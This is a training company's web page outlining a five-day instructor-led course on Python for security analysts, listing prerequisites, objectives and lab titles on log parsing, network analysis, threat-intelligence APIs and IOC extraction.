Public Schedule

Python for Security Analysts and Professionals

  • Courses
  • Python for Security Analysts and Professionals

Information Technology

Leadership

Business Analysis

Certifications

Project Management

Public Schedule

Our Blogs

Get Course Information

Connect for information with us at info@velocityknowledge.com

How would you like to learn?*

Duration: 5-days Instructor-led

Course Description

This 5-day instructor-led course is designed to teach security analysts, cybersecurity professionals, and incident responders how to leverage Python to automate security tasks, analyze logs, extract indicators of compromise (IOCs), and interact with APIs and tools commonly used in the cybersecurity field. Through real-world examples and hands-on labs, participants will gain practical skills to build custom tools and streamline their security operations.

Prerequisites

  • Basic understanding of cybersecurity concepts (SIEM, log analysis, threat detection)
  • Familiarity with security tools (Wireshark, Splunk, VirusTotal, etc.)
  • Basic experience using the Linux command line
  • No prior Python experience is required, but general programming knowledge is helpful

Key Objectives

By the end of the course, participants will be able to:

  • Understand Python fundamentals relevant to cybersecurity use cases
  • Automate routine security operations and parsing of large log files
  • Analyze files, network traffic, and system processes using Python
  • Interact with APIs to gather threat intelligence
  • Build tools for malware analysis, IOC extraction, and incident response
  • Use Python to assist in vulnerability scanning and reporting

Course Takeaways

  • Solid foundation in Python programming from a security perspective
  • Hands-on experience building security tools and automations
  • Access to a toolkit of scripts and code templates for everyday tasks
  • Guidance on how to continue developing Python skills after the course
  • Certificate of completion

Section 1: Python Fundamentals for Security Workflows

Module 1: Python Basics Refresher

  • Syntax, variables, data types
  • Control structures (if, for, while)
  • Functions and modules
  • File input and output
  • Working with JSON and CSV data

Module 2: Working with Files and Logs

  • Reading and parsing log files (Apache, syslog, Windows Event Logs)
  • String operations and regular expressions
  • Error handling and script structuring

Hands-On Labs

  • Lab 1: Parse a system log file to extract failed login attempts
  • Lab 2: Build a basic log summarizer using Python
  • Lab 3: Extract IP addresses and URLs using regex

Section  2: Automating Security Operations

Module 3: OS Interaction and Automation

  • Using the os and subprocess modules
  • Running system commands and collecting outputs
  • Scheduling and scripting automation tasks

Module 4: File and Process Monitoring

  • Working with filesystems and directories
  • Basic process inspection and filtering
  • Simple change detection scripting

Hands-On Labs

  • Lab 4: Script to monitor changes in a sensitive directory
  • Lab 5: Automate execution of a local antivirus scan and log results
  • Lab 6: Use Python to detect suspicious processes based on criteria

Section 3: Network Analysis and Packet Inspection

Module 5: Network Programming with Python

  • Using socket to capture traffic and scan ports
  • Crafting packets with Scapy
  • Parsing and inspecting PCAP files

Module 6: Intrusion Detection Support

  • Building basic signature-based detection tools
  • Identifying anomalies in traffic
  • Correlating IPs and ports with threat intelligence

Hands-On Labs

  • Lab 7: Build a simple port scanner with socket
  • Lab 8: Parse a PCAP file to extract DNS and HTTP data
  • Lab 9: Use Scapy to detect ARP spoofing on a local network

Section 4: Threat Intelligence and Malware Analysis

Module 7: Working with Threat Intelligence APIs

  • Using requests to make API calls
  • Integrating with VirusTotal, AbuseIPDB, AlienVault OTX
  • Parsing and storing threat intelligence results

Module 8: IOC Extraction and Malware Indicators

  • Extracting file hashes, domains, IPs from suspicious files
  • Automating hash lookups and URL reputation checks
  • Basic static analysis of suspicious scripts or binaries

Hands-On Labs

  • Lab 10: Use VirusTotal API to enrich indicators
  • Lab 11: Build a tool to extract IOCs from phishing emails
  • Lab 12: Analyze a suspicious PowerShell script for malicious indicators

Section 5: Building Security Tools and Final Project

Module 9: Python for Vulnerability Scanning

  • Automating Nmap and Nikto with Python
  • Parsing XML and JSON outputs
  • Building custom reporting tools

Module 10: Putting It All Together

  • Organizing code into reusable modules
  • Logging, exception handling, and reporting
  • Final project briefing and walkthrough

Contact us to customize this course for your team and for your organization.

Contact Us?
Close

Search

Interested?
Python for Security Analysts and Professionals

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.